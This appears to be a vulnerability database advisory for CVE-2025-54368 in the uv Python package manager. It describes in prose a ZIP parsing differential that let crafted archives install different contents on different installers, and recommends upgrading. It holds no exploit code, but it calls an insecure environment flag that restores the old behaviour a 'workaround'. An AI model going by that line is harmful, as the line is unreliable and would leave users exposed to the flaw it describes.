PT-2025-32302 · Uv · Uv
Calebbrown
·
Published
2025-08-07
·
Updated
2025-10-11
·
CVE-2025-54368
CVSS v4.0
6.8
Medium
| Vector | AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
Name of the Vulnerable Software and Affected Versions
uv versions 0.8.5 and earlier
Description
uv is a Python package and project manager written in Rust. Versions 0.8.5 and earlier handled remote ZIP archives in a streamwise fashion without reconciling file entries against the archive’s central directory. This allowed an attacker to create a ZIP archive that would extract with legitimate contents on some package installers and malicious contents on others, or a "stacked" ZIP input with multiple internal ZIPs, which would be handled differently by different package installers. This could be used to target specific installers.
Recommendations
uv versions prior to 0.8.6 should be upgraded.
As a workaround, set the environment variable
UV INSECURE NO ZIP VALIDATION to 1 to revert to the previous behavior.Exploit
Fix
RCE
Found an issue in the description? Have something to add? Feel free to write us 👾
Related Identifiers
Affected Products
Uv